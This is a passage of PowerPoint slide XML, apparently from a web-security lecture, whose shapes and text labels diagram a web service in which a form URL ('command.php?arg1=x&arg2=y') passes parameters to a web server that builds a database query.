          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5"/>
          </a:solidFill>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="4445" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="35"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="3550" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="835660" marR="650875" indent="-177165">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Database  server</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="object 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8001000" y="3429000"/>
            <a:ext cx="0" cy="1447800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1447800">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1447799"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="object 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7980022" y="4876800"/>
            <a:ext cx="42545" cy="57785"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="42545" h="57785">
                <a:moveTo>
                  <a:pt x="20977" y="57633"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41954" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20977" y="57633"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="40458C"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="object 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7980022" y="4876800"/>
            <a:ext cx="42545" cy="57785"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="42545" h="57785">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20977" y="57633"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41954" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Title 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C53BBFC-A458-E84B-9D47-9B1678B3B7BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Structure of Web Service</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3276600" y="2057400"/>
            <a:ext cx="2667000" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2667000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2666999" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5943600" y="2036422"/>
            <a:ext cx="57785" cy="42545"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="57785" h="42544">
                <a:moveTo>
                  <a:pt x="0" y="41953"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57633" y="20976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="41953"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="B7C1EB"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5943600" y="2036422"/>
            <a:ext cx="57785" cy="42545"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="57785" h="42544">
                <a:moveTo>
                  <a:pt x="0" y="41953"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="57633" y="20976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="41953"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6019800" y="1752600"/>
            <a:ext cx="2362200" cy="1676400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5"/>
          </a:solidFill>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="4445" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="35"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="3550" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="835660" marR="828040" indent="-635" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Web  server</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3679826" y="1691642"/>
            <a:ext cx="1305560" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>URL </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-95" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Form</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5402659" y="2986486"/>
            <a:ext cx="121920" cy="121920"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="121920" h="121919">
                <a:moveTo>
                  <a:pt x="0" y="121840"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="24367" y="24368"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121840" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="121840"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="CBCBCB"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3619500" y="2133601"/>
            <a:ext cx="1905000" cy="974725"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1905000" h="974725">
                <a:moveTo>
                  <a:pt x="1783159" y="974724"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1807527" y="877252"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1904999" y="852884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1783159" y="974724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="974724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1904999" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1904999" y="852884"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3701269" y="2079984"/>
            <a:ext cx="1741170" cy="939800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" marR="5080" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>command.php?  arg1=x&amp;arg2=  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6019800" y="4953000"/>
            <a:ext cx="2362200" cy="1676400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5"/>
          </a:solidFill>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="4445" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="35"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="3550">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="835660" marR="650875" indent="-177165">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Database  server</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8001000" y="3429000"/>
            <a:ext cx="0" cy="1447800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1447800">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1447799"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7980022" y="4876800"/>
            <a:ext cx="42545" cy="57785"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="42545" h="57785">
                <a:moveTo>
                  <a:pt x="20977" y="57633"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41954" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20977" y="57633"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="40458C"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="object 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7980022" y="4876800"/>
            <a:ext cx="42545" cy="57785"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="42545" h="57785">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20977" y="57633"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41954" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="object 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7822009" y="4453336"/>
            <a:ext cx="102870" cy="102870"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="102870" h="102870">
                <a:moveTo>
                  <a:pt x="0" y="102790"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20557" y="20558"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102790" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="102790"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="CBCBCB"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="object 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5867400" y="3733801"/>
            <a:ext cx="2057400" cy="822325"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2057400" h="822325">
                <a:moveTo>
                  <a:pt x="1954609" y="822324"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1975167" y="740092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2057399" y="719534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1954609" y="822324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="822324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2057399" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2057399" y="719534"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="19049">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="object 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5987082" y="3795500"/>
            <a:ext cx="1814195" cy="575945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="10795" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" marR="5080" indent="104775">
              <a:lnSpc>
                <a:spcPct val="100699"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="85"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Database query  built from </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>x </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-95" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="object 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1093740" y="1703340"/>
            <a:ext cx="2260600" cy="1733550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId2" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="object 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="1752600"/>
            <a:ext cx="2108199" cy="1581149"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="object 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2514600" y="2514600"/>
            <a:ext cx="703580" cy="685800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="703580" h="685800">
                <a:moveTo>
